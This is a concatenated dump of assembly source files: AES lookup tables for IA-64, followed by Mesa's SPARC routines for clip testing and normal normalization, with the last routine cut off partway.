data4 0xe0707090,0xe0707090, 0x7c3e3e42,0x7c3e3e42
data4 0x71b5b5c4,0x71b5b5c4, 0xcc6666aa,0xcc6666aa
data4 0x904848d8,0x904848d8, 0x06030305,0x06030305
data4 0xf7f6f601,0xf7f6f601, 0x1c0e0e12,0x1c0e0e12
data4 0xc26161a3,0xc26161a3, 0x6a35355f,0x6a35355f
data4 0xae5757f9,0xae5757f9, 0x69b9b9d0,0x69b9b9d0
data4 0x17868691,0x17868691, 0x99c1c158,0x99c1c158
data4 0x3a1d1d27,0x3a1d1d27, 0x279e9eb9,0x279e9eb9
data4 0xd9e1e138,0xd9e1e138, 0xebf8f813,0xebf8f813
data4 0x2b9898b3,0x2b9898b3, 0x22111133,0x22111133
data4 0xd26969bb,0xd26969bb, 0xa9d9d970,0xa9d9d970
data4 0x078e8e89,0x078e8e89, 0x339494a7,0x339494a7
data4 0x2d9b9bb6,0x2d9b9bb6, 0x3c1e1e22,0x3c1e1e22
data4 0x15878792,0x15878792, 0xc9e9e920,0xc9e9e920
data4 0x87cece49,0x87cece49, 0xaa5555ff,0xaa5555ff
data4 0x50282878,0x50282878, 0xa5dfdf7a,0xa5dfdf7a
data4 0x038c8c8f,0x038c8c8f, 0x59a1a1f8,0x59a1a1f8
data4 0x09898980,0x09898980, 0x1a0d0d17,0x1a0d0d17
data4 0x65bfbfda,0x65bfbfda, 0xd7e6e631,0xd7e6e631
data4 0x844242c6,0x844242c6, 0xd06868b8,0xd06868b8
data4 0x824141c3,0x824141c3, 0x299999b0,0x299999b0
data4 0x5a2d2d77,0x5a2d2d77, 0x1e0f0f11,0x1e0f0f11
data4 0x7bb0b0cb,0x7bb0b0cb, 0xa85454fc,0xa85454fc
data4 0x6dbbbbd6,0x6dbbbbd6, 0x2c16163a,0x2c16163a
// Te4:
data1 0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5
data1 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76
data1 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0
data1 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0
data1 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc
data1 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15
data1 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a
data1 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75
data1 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0
data1 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84
data1 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b
data1 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf
data1 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85
data1 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8
data1 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5
data1 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2
data1 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17
data1 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73
data1 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88
data1 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb
data1 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c
data1 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79
data1 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9
data1 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08
data1 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6
data1 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a
data1 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e
data1 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e
data1 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94
data1 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf
data1 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68
data1 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16
.size AES_Te#,2048+256 // HP-UX assembler fails to ".-AES_Te#"
.align 64
.global AES_Td#
.type AES_Td#,@object
AES_Td: data4 0x51f4a750,0x51f4a750, 0x7e416553,0x7e416553
data4 0x1a17a4c3,0x1a17a4c3, 0x3a275e96,0x3a275e96
data4 0x3bab6bcb,0x3bab6bcb, 0x1f9d45f1,0x1f9d45f1
data4 0xacfa58ab,0xacfa58ab, 0x4be30393,0x4be30393
data4 0x2030fa55,0x2030fa55, 0xad766df6,0xad766df6
data4 0x88cc7691,0x88cc7691, 0xf5024c25,0xf5024c25
data4 0x4fe5d7fc,0x4fe5d7fc, 0xc52acbd7,0xc52acbd7
data4 0x26354480,0x26354480, 0xb562a38f,0xb562a38f
data4 0xdeb15a49,0xdeb15a49, 0x25ba1b67,0x25ba1b67
data4 0x45ea0e98,0x45ea0e98, 0x5dfec0e1,0x5dfec0e1
data4 0xc32f7502,0xc32f7502, 0x814cf012,0x814cf012
data4 0x8d4697a3,0x8d4697a3, 0x6bd3f9c6,0x6bd3f9c6
data4 0x038f5fe7,0x038f5fe7, 0x15929c95,0x15929c95
data4 0xbf6d7aeb,0xbf6d7aeb, 0x955259da,0x955259da
data4 0xd4be832d,0xd4be832d, 0x587421d3,0x587421d3
data4 0x49e06929,0x49e06929, 0x8ec9c844,0x8ec9c844
data4 0x75c2896a,0x75c2896a, 0xf48e7978,0xf48e7978
data4 0x99583e6b,0x99583e6b, 0x27b971dd,0x27b971dd
data4 0xbee14fb6,0xbee14fb6, 0xf088ad17,0xf088ad17
data4 0xc920ac66,0xc920ac66, 0x7dce3ab4,0x7dce3ab4
data4 0x63df4a18,0x63df4a18, 0xe51a3182,0xe51a3182
data4 0x97513360,0x97513360, 0x62537f45,0x62537f45
data4 0xb16477e0,0xb16477e0, 0xbb6bae84,0xbb6bae84
data4 0xfe81a01c,0xfe81a01c, 0xf9082b94,0xf9082b94
data4 0x70486858,0x70486858, 0x8f45fd19,0x8f45fd19
data4 0x94de6c87,0x94de6c87, 0x527bf8b7,0x527bf8b7
data4 0xab73d323,0xab73d323, 0x724b02e2,0x724b02e2
data4 0xe31f8f57,0xe31f8f57, 0x6655ab2a,0x6655ab2a
data4 0xb2eb2807,0xb2eb2807, 0x2fb5c203,0x2fb5c203
data4 0x86c57b9a,0x86c57b9a, 0xd33708a5,0xd33708a5
data4 0x302887f2,0x302887f2, 0x23bfa5b2,0x23bfa5b2
data4 0x02036aba,0x02036aba, 0xed16825c,0xed16825c
data4 0x8acf1c2b,0x8acf1c2b, 0xa779b492,0xa779b492
data4 0xf307f2f0,0xf307f2f0, 0x4e69e2a1,0x4e69e2a1
data4 0x65daf4cd,0x65daf4cd, 0x0605bed5,0x0605bed5
data4 0xd134621f,0xd134621f, 0xc4a6fe8a,0xc4a6fe8a
data4 0x342e539d,0x342e539d, 0xa2f355a0,0xa2f355a0
data4 0x058ae132,0x058ae132, 0xa4f6eb75,0xa4f6eb75
data4 0x0b83ec39,0x0b83ec39, 0x4060efaa,0x4060efaa
data4 0x5e719f06,0x5e719f06, 0xbd6e1051,0xbd6e1051
data4 0x3e218af9,0x3e218af9, 0x96dd063d,0x96dd063d
data4 0xdd3e05ae,0xdd3e05ae, 0x4de6bd46,0x4de6bd46
data4 0x91548db5,0x91548db5, 0x71c45d05,0x71c45d05
data4 0x0406d46f,0x0406d46f, 0x605015ff,0x605015ff
data4 0x1998fb24,0x1998fb24, 0xd6bde997,0xd6bde997
data4 0x894043cc,0x894043cc, 0x67d99e77,0x67d99e77
data4 0xb0e842bd,0xb0e842bd, 0x07898b88,0x07898b88
data4 0xe7195b38,0xe7195b38, 0x79c8eedb,0x79c8eedb
data4 0xa17c0a47,0xa17c0a47, 0x7c420fe9,0x7c420fe9
data4 0xf8841ec9,0xf8841ec9, 0x00000000,0x00000000
data4 0x09808683,0x09808683, 0x322bed48,0x322bed48
data4 0x1e1170ac,0x1e1170ac, 0x6c5a724e,0x6c5a724e
data4 0xfd0efffb,0xfd0efffb, 0x0f853856,0x0f853856
data4 0x3daed51e,0x3daed51e, 0x362d3927,0x362d3927
data4 0x0a0fd964,0x0a0fd964, 0x685ca621,0x685ca621
data4 0x9b5b54d1,0x9b5b54d1, 0x24362e3a,0x24362e3a
data4 0x0c0a67b1,0x0c0a67b1, 0x9357e70f,0x9357e70f
data4 0xb4ee96d2,0xb4ee96d2, 0x1b9b919e,0x1b9b919e
data4 0x80c0c54f,0x80c0c54f, 0x61dc20a2,0x61dc20a2
data4 0x5a774b69,0x5a774b69, 0x1c121a16,0x1c121a16
data4 0xe293ba0a,0xe293ba0a, 0xc0a02ae5,0xc0a02ae5
data4 0x3c22e043,0x3c22e043, 0x121b171d,0x121b171d
data4 0x0e090d0b,0x0e090d0b, 0xf28bc7ad,0xf28bc7ad
data4 0x2db6a8b9,0x2db6a8b9, 0x141ea9c8,0x141ea9c8
data4 0x57f11985,0x57f11985, 0xaf75074c,0xaf75074c
data4 0xee99ddbb,0xee99ddbb, 0xa37f60fd,0xa37f60fd
data4 0xf701269f,0xf701269f, 0x5c72f5bc,0x5c72f5bc
data4 0x44663bc5,0x44663bc5, 0x5bfb7e34,0x5bfb7e34
data4 0x8b432976,0x8b432976, 0xcb23c6dc,0xcb23c6dc
data4 0xb6edfc68,0xb6edfc68, 0xb8e4f163,0xb8e4f163
data4 0xd731dcca,0xd731dcca, 0x42638510,0x42638510
data4 0x13972240,0x13972240, 0x84c61120,0x84c61120
data4 0x854a247d,0x854a247d, 0xd2bb3df8,0xd2bb3df8
data4 0xaef93211,0xaef93211, 0xc729a16d,0xc729a16d
data4 0x1d9e2f4b,0x1d9e2f4b, 0xdcb230f3,0xdcb230f3
data4 0x0d8652ec,0x0d8652ec, 0x77c1e3d0,0x77c1e3d0
data4 0x2bb3166c,0x2bb3166c, 0xa970b999,0xa970b999
data4 0x119448fa,0x119448fa, 0x47e96422,0x47e96422
data4 0xa8fc8cc4,0xa8fc8cc4, 0xa0f03f1a,0xa0f03f1a
data4 0x567d2cd8,0x567d2cd8, 0x223390ef,0x223390ef
data4 0x87494ec7,0x87494ec7, 0xd938d1c1,0xd938d1c1
data4 0x8ccaa2fe,0x8ccaa2fe, 0x98d40b36,0x98d40b36
data4 0xa6f581cf,0xa6f581cf, 0xa57ade28,0xa57ade28
data4 0xdab78e26,0xdab78e26, 0x3fadbfa4,0x3fadbfa4
data4 0x2c3a9de4,0x2c3a9de4, 0x5078920d,0x5078920d
data4 0x6a5fcc9b,0x6a5fcc9b, 0x547e4662,0x547e4662
data4 0xf68d13c2,0xf68d13c2, 0x90d8b8e8,0x90d8b8e8
data4 0x2e39f75e,0x2e39f75e, 0x82c3aff5,0x82c3aff5
data4 0x9f5d80be,0x9f5d80be, 0x69d0937c,0x69d0937c
data4 0x6fd52da9,0x6fd52da9, 0xcf2512b3,0xcf2512b3
data4 0xc8ac993b,0xc8ac993b, 0x10187da7,0x10187da7
data4 0xe89c636e,0xe89c636e, 0xdb3bbb7b,0xdb3bbb7b
data4 0xcd267809,0xcd267809, 0x6e5918f4,0x6e5918f4
data4 0xec9ab701,0xec9ab701, 0x834f9aa8,0x834f9aa8
data4 0xe6956e65,0xe6956e65, 0xaaffe67e,0xaaffe67e
data4 0x21bccf08,0x21bccf08, 0xef15e8e6,0xef15e8e6
data4 0xbae79bd9,0xbae79bd9, 0x4a6f36ce,0x4a6f36ce
data4 0xea9f09d4,0xea9f09d4, 0x29b07cd6,0x29b07cd6
data4 0x31a4b2af,0x31a4b2af, 0x2a3f2331,0x2a3f2331
data4 0xc6a59430,0xc6a59430, 0x35a266c0,0x35a266c0
data4 0x744ebc37,0x744ebc37, 0xfc82caa6,0xfc82caa6
data4 0xe090d0b0,0xe090d0b0, 0x33a7d815,0x33a7d815
data4 0xf104984a,0xf104984a, 0x41ecdaf7,0x41ecdaf7
data4 0x7fcd500e,0x7fcd500e, 0x1791f62f,0x1791f62f
data4 0x764dd68d,0x764dd68d, 0x43efb04d,0x43efb04d
data4 0xccaa4d54,0xccaa4d54, 0xe49604df,0xe49604df
data4 0x9ed1b5e3,0x9ed1b5e3, 0x4c6a881b,0x4c6a881b
data4 0xc12c1fb8,0xc12c1fb8, 0x4665517f,0x4665517f
data4 0x9d5eea04,0x9d5eea04, 0x018c355d,0x018c355d
data4 0xfa877473,0xfa877473, 0xfb0b412e,0xfb0b412e
data4 0xb3671d5a,0xb3671d5a, 0x92dbd252,0x92dbd252
data4 0xe9105633,0xe9105633, 0x6dd64713,0x6dd64713
data4 0x9ad7618c,0x9ad7618c, 0x37a10c7a,0x37a10c7a
data4 0x59f8148e,0x59f8148e, 0xeb133c89,0xeb133c89
data4 0xcea927ee,0xcea927ee, 0xb761c935,0xb761c935
data4 0xe11ce5ed,0xe11ce5ed, 0x7a47b13c,0x7a47b13c
data4 0x9cd2df59,0x9cd2df59, 0x55f2733f,0x55f2733f
data4 0x1814ce79,0x1814ce79, 0x73c737bf,0x73c737bf
data4 0x53f7cdea,0x53f7cdea, 0x5ffdaa5b,0x5ffdaa5b
data4 0xdf3d6f14,0xdf3d6f14, 0x7844db86,0x7844db86
data4 0xcaaff381,0xcaaff381, 0xb968c43e,0xb968c43e
data4 0x3824342c,0x3824342c, 0xc2a3405f,0xc2a3405f
data4 0x161dc372,0x161dc372, 0xbce2250c,0xbce2250c
data4 0x283c498b,0x283c498b, 0xff0d9541,0xff0d9541
data4 0x39a80171,0x39a80171, 0x080cb3de,0x080cb3de
data4 0xd8b4e49c,0xd8b4e49c, 0x6456c190,0x6456c190
data4 0x7bcb8461,0x7bcb8461, 0xd532b670,0xd532b670
data4 0x486c5c74,0x486c5c74, 0xd0b85742,0xd0b85742
// Td4:
data1 0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38
data1 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb
data1 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87
data1 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb
data1 0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d
data1 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e
data1 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2
data1 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25
data1 0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16
data1 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92
data1 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda
data1 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84
data1 0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a
data1 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06
data1 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02
data1 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b
data1 0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea
data1 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73
data1 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85
data1 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e
data1 0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89
data1 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b
data1 0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20
data1 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4
data1 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31
data1 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f
data1 0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d
data1 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef
data1 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0
data1 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61
data1 0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26
data1 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d
.size AES_Td#,2048+256 // HP-UX assembler fails to ".-AES_Td#"
|
AIFM-sys/AIFM
| 6,187
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/sparc/clip.S
|
/*
* Clip testing in SPARC assembly
*/
#if __arch64__
#define LDPTR ldx
#define V4F_DATA 0x00
#define V4F_START 0x08
#define V4F_COUNT 0x10
#define V4F_STRIDE 0x14
#define V4F_SIZE 0x18
#define V4F_FLAGS 0x1c
#else
#define LDPTR ld
#define V4F_DATA 0x00
#define V4F_START 0x04
#define V4F_COUNT 0x08
#define V4F_STRIDE 0x0c
#define V4F_SIZE 0x10
#define V4F_FLAGS 0x14
#endif
#define VEC_SIZE_1 1
#define VEC_SIZE_2 3
#define VEC_SIZE_3 7
#define VEC_SIZE_4 15
#if defined(SVR4) || defined(__SVR4) || defined(__svr4__)
/* Solaris requires this for 64-bit. */
.register %g2, #scratch
.register %g3, #scratch
.register %g7, #scratch
#endif
.text
.align 64
one_dot_zero:
.word 0x3f800000 /* 1.0f */
/* This trick is shamelessly stolen from the x86
* Mesa asm. Very clever, and we can do it too
* since we have the necessary add with carry
* instructions on Sparc.
*/
clip_table:
.byte 0, 1, 0, 2, 4, 5, 4, 6
.byte 0, 1, 0, 2, 8, 9, 8, 10
.byte 32, 33, 32, 34, 36, 37, 36, 38
.byte 32, 33, 32, 34, 40, 41, 40, 42
.byte 0, 1, 0, 2, 4, 5, 4, 6
.byte 0, 1, 0, 2, 8, 9, 8, 10
.byte 16, 17, 16, 18, 20, 21, 20, 22
.byte 16, 17, 16, 18, 24, 25, 24, 26
.byte 63, 61, 63, 62, 55, 53, 55, 54
.byte 63, 61, 63, 62, 59, 57, 59, 58
.byte 47, 45, 47, 46, 39, 37, 39, 38
.byte 47, 45, 47, 46, 43, 41, 43, 42
.byte 63, 61, 63, 62, 55, 53, 55, 54
.byte 63, 61, 63, 62, 59, 57, 59, 58
.byte 31, 29, 31, 30, 23, 21, 23, 22
.byte 31, 29, 31, 30, 27, 25, 27, 26
/* GLvector4f *clip_vec, GLvector4f *proj_vec,
GLubyte clipMask[], GLubyte *orMask, GLubyte *andMask */
.align 64
__pc_tramp:
retl
nop
.globl _mesa_sparc_cliptest_points4
_mesa_sparc_cliptest_points4:
save %sp, -64, %sp
call __pc_tramp
sub %o7, (. - one_dot_zero - 4), %g1
ld [%g1 + 0x0], %f4
add %g1, 0x4, %g1
ld [%i0 + V4F_STRIDE], %l1
ld [%i0 + V4F_COUNT], %g7
LDPTR [%i0 + V4F_START], %i0
LDPTR [%i1 + V4F_START], %i5
ldub [%i3], %g2
ldub [%i4], %g3
sll %g3, 8, %g3
or %g2, %g3, %g2
ld [%i1 + V4F_FLAGS], %g3
or %g3, VEC_SIZE_4, %g3
st %g3, [%i1 + V4F_FLAGS]
mov 3, %g3
st %g3, [%i1 + V4F_SIZE]
st %g7, [%i1 + V4F_COUNT]
clr %l2
clr %l0
/* l0: i
* g7: count
* l1: stride
* l2: c
* g2: (tmpAndMask << 8) | tmpOrMask
* g1: clip_table
* i0: from[stride][i]
* i2: clipMask
* i5: vProj[4][i]
*/
1: ld [%i0 + 0x0c], %f3 ! LSU Group
ld [%i0 + 0x0c], %g5 ! LSU Group
ld [%i0 + 0x08], %g4 ! LSU Group
fdivs %f4, %f3, %f8 ! FGM
addcc %g5, %g5, %g5 ! IEU1 Group
addx %g0, 0x0, %g3 ! IEU1 Group
addcc %g4, %g4, %g4 ! IEU1 Group
addx %g3, %g3, %g3 ! IEU1 Group
subcc %g5, %g4, %g0 ! IEU1 Group
ld [%i0 + 0x04], %g4 ! LSU Group
addx %g3, %g3, %g3 ! IEU1 Group
addcc %g4, %g4, %g4 ! IEU1 Group
addx %g3, %g3, %g3 ! IEU1 Group
subcc %g5, %g4, %g0 ! IEU1 Group
ld [%i0 + 0x00], %g4 ! LSU Group
addx %g3, %g3, %g3 ! IEU1 Group
addcc %g4, %g4, %g4 ! IEU1 Group
addx %g3, %g3, %g3 ! IEU1 Group
subcc %g5, %g4, %g0 ! IEU1 Group
addx %g3, %g3, %g3 ! IEU1 Group
ldub [%g1 + %g3], %g3 ! LSU Group
cmp %g3, 0 ! IEU1 Group, stall
be 2f ! CTI
stb %g3, [%i2] ! LSU
sll %g3, 8, %g4 ! IEU1 Group
add %l2, 1, %l2 ! IEU0
st %g0, [%i5 + 0x00] ! LSU
or %g4, 0xff, %g4 ! IEU0 Group
or %g2, %g3, %g2 ! IEU1
st %g0, [%i5 + 0x04] ! LSU
and %g2, %g4, %g2 ! IEU0 Group
st %g0, [%i5 + 0x08] ! LSU
b 3f ! CTI
st %f4, [%i5 + 0x0c] ! LSU Group
2: ld [%i0 + 0x00], %f0 ! LSU Group
ld [%i0 + 0x04], %f1 ! LSU Group
ld [%i0 + 0x08], %f2 ! LSU Group
fmuls %f0, %f8, %f0 ! FGM
st %f0, [%i5 + 0x00] ! LSU Group
fmuls %f1, %f8, %f1 ! FGM
st %f1, [%i5 + 0x04] ! LSU Group
fmuls %f2, %f8, %f2 ! FGM
st %f2, [%i5 + 0x08] ! LSU Group
st %f8, [%i5 + 0x0c] ! LSU Group
3: add %i5, 0x10, %i5 ! IEU1
add %l0, 1, %l0 ! IEU0 Group
add %i2, 1, %i2 ! IEU0 Group
cmp %l0, %g7 ! IEU1 Group
bne 1b ! CTI
add %i0, %l1, %i0 ! IEU0 Group
stb %g2, [%i3] ! LSU
srl %g2, 8, %g3 ! IEU0 Group
cmp %l2, %g7 ! IEU1 Group
bl,a 1f ! CTI
clr %g3 ! IEU0
1: stb %g3, [%i4] ! LSU Group
ret ! CTI Group
restore %i1, 0x0, %o0
.globl _mesa_sparc_cliptest_points4_np
_mesa_sparc_cliptest_points4_np:
save %sp, -64, %sp
call __pc_tramp
sub %o7, (. - one_dot_zero - 4), %g1
add %g1, 0x4, %g1
ld [%i0 + V4F_STRIDE], %l1
ld [%i0 + V4F_COUNT], %g7
LDPTR [%i0 + V4F_START], %i0
LDPTR [%i1 + V4F_START], %i5
ldub [%i3], %g2
ldub [%i4], %g3
sll %g3, 8, %g3
or %g2, %g3, %g2
ld [%i1 + V4F_FLAGS], %g3
or %g3, VEC_SIZE_4, %g3
st %g3, [%i1 + V4F_FLAGS]
mov 3, %g3
st %g3, [%i1 + V4F_SIZE]
st %g7, [%i1 + V4F_COUNT]
clr %l2
clr %l0
/* l0: i
* g7: count
* l1: stride
* l2: c
* g2: (tmpAndMask << 8) | tmpOrMask
* g1: clip_table
* i0: from[stride][i]
* i2: clipMask
*/
1: ld [%i0 + 0x0c], %g5 ! LSU Group
ld [%i0 + 0x08], %g4 ! LSU Group
addcc %g5, %g5, %g5 ! IEU1 Group
addx %g0, 0x0, %g3 ! IEU1 Group
addcc %g4, %g4, %g4 ! IEU1 Group
addx %g3, %g3, %g3 ! IEU1 Group
subcc %g5, %g4, %g0 ! IEU1 Group
ld [%i0 + 0x04], %g4 ! LSU Group
addx %g3, %g3, %g3 ! IEU1 Group
addcc %g4, %g4, %g4 ! IEU1 Group
addx %g3, %g3, %g3 ! IEU1 Group
subcc %g5, %g4, %g0 ! IEU1 Group
ld [%i0 + 0x00], %g4 ! LSU Group
addx %g3, %g3, %g3 ! IEU1 Group
addcc %g4, %g4, %g4 ! IEU1 Group
addx %g3, %g3, %g3 ! IEU1 Group
subcc %g5, %g4, %g0 ! IEU1 Group
addx %g3, %g3, %g3 ! IEU1 Group
ldub [%g1 + %g3], %g3 ! LSU Group
cmp %g3, 0 ! IEU1 Group, stall
be 2f ! CTI
stb %g3, [%i2] ! LSU
sll %g3, 8, %g4 ! IEU1 Group
add %l2, 1, %l2 ! IEU0
or %g4, 0xff, %g4 ! IEU0 Group
or %g2, %g3, %g2 ! IEU1
and %g2, %g4, %g2 ! IEU0 Group
2: add %l0, 1, %l0 ! IEU0 Group
add %i2, 1, %i2 ! IEU0 Group
cmp %l0, %g7 ! IEU1 Group
bne 1b ! CTI
add %i0, %l1, %i0 ! IEU0 Group
stb %g2, [%i3] ! LSU
srl %g2, 8, %g3 ! IEU0 Group
cmp %l2, %g7 ! IEU1 Group
bl,a 1f ! CTI
clr %g3 ! IEU0
1: stb %g3, [%i4] ! LSU Group
ret ! CTI Group
restore %i1, 0x0, %o0
|
AIFM-sys/AIFM
| 16,749
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/sparc/norm.S
|
/* $Id: norm.S,v 1.1.1.1 2012/03/29 17:22:11 uid42307 Exp $ */
#include "sparc_matrix.h"
#if defined(SVR4) || defined(__SVR4) || defined(__svr4__)
/* Solaris requires this for 64-bit. */
.register %g2, #scratch
.register %g3, #scratch
#endif
.text
#ifdef __arch64__
#define STACK_VAR_OFF (2047 + (8 * 16))
#else
#define STACK_VAR_OFF (4 * 16)
#endif
/* Newton-Raphson approximation turns out to be slower
* (and less accurate) than direct fsqrts/fdivs.
*/
#define ONE_DOT_ZERO 0x3f800000
.globl _mesa_sparc_transform_normalize_normals
_mesa_sparc_transform_normalize_normals:
/* o0=mat o1=scale o2=in o3=lengths o4=dest */
sethi %hi(ONE_DOT_ZERO), %g2
sub %sp, 16, %sp
st %g2, [%sp + STACK_VAR_OFF+0x0]
st %o1, [%sp + STACK_VAR_OFF+0x4]
ld [%sp + STACK_VAR_OFF+0x0], %f12 ! f12 = 1.0f
ld [%sp + STACK_VAR_OFF+0x4], %f15 ! f15 = scale
add %sp, 16, %sp
LDPTR [%o0 + MAT_INV], %o0 ! o0 = mat->inv
LDPTR [%o2 + V4F_START], %o5 ! o5 = 'from' in->start
ld [%o2 + V4F_COUNT], %g1 ! g1 = in->count
ld [%o2 + V4F_STRIDE], %g2 ! g2 = in->stride
LDPTR [%o4 + V4F_START], %g3 ! g3 = 'out' dest->start
LDMATRIX_0_1_2_4_5_6_8_9_10(%o0)
/* dest->count = in->count */
st %g1, [%o4 + V4F_COUNT]
cmp %g1, 1
bl 7f
cmp %o3, 0
bne 4f
clr %o4 ! 'i' for STRIDE_LOOP
1: /* LENGTHS == NULL */
ld [%o5 + 0x00], %f0 ! ux = from[0]
ld [%o5 + 0x04], %f1 ! uy = from[1]
ld [%o5 + 0x08], %f2 ! uz = from[2]
add %o5, %g2, %o5 ! STRIDE_F(from, stride)
add %o4, 1, %o4 ! i++
/* tx (f3) = (ux * m0) + (uy * m1) + (uz * m2)
* ty (f5) = (ux * m4) + (uy * m5) + (uz * m6)
* tz (f7) = (ux * m8) + (uy * m9) + (uz * m10)
*/
fmuls %f0, M0, %f3 ! FGM Group
fmuls %f1, M1, %f4 ! FGM Group
fmuls %f0, M4, %f5 ! FGM Group
fmuls %f1, M5, %f6 ! FGM Group
fmuls %f0, M8, %f7 ! FGM Group f3 available
fmuls %f1, M9, %f8 ! FGM Group f4 available
fadds %f3, %f4, %f3 ! FGA
fmuls %f2, M2, %f10 ! FGM Group f5 available
fmuls %f2, M6, %f0 ! FGM Group f6 available
fadds %f5, %f6, %f5 ! FGA
fmuls %f2, M10, %f4 ! FGM Group f7 available
fadds %f7, %f8, %f7 ! FGA Group f8,f3 available
fadds %f3, %f10, %f3 ! FGA Group f10 available
fadds %f5, %f0, %f5 ! FGA Group stall f0,f5 available
fadds %f7, %f4, %f7 ! FGA Group stall f4,f7 available
/* f3=tx, f5=ty, f7=tz */
/* len (f6) = (tx * tx) + (ty * ty) + (tz * tz) */
fmuls %f3, %f3, %f6 ! FGM Group f3 available
fmuls %f5, %f5, %f8 ! FGM Group f5 available
fmuls %f7, %f7, %f10 ! FGM Group f7 available
fadds %f6, %f8, %f6 ! FGA Group 2cyc stall f6,f8 available
fadds %f6, %f10, %f6 ! FGA Group 4cyc stall f6,f10 available
/* scale (f6) = 1.0 / sqrt(len) */
fsqrts %f6, %f6 ! FDIV 20 cycles
fdivs %f12, %f6, %f6 ! FDIV 14 cycles
fmuls %f3, %f6, %f3
st %f3, [%g3 + 0x00] ! out[i][0] = tx * scale
fmuls %f5, %f6, %f5
st %f5, [%g3 + 0x04] ! out[i][1] = ty * scale
fmuls %f7, %f6, %f7
st %f7, [%g3 + 0x08] ! out[i][2] = tz * scale
cmp %o4, %g1 ! continue if (i < count)
bl 1b
add %g3, 0x0c, %g3 ! advance out vector pointer
ba 7f
nop
4: /* LENGTHS != NULL */
fmuls M0, %f15, M0
fmuls M1, %f15, M1
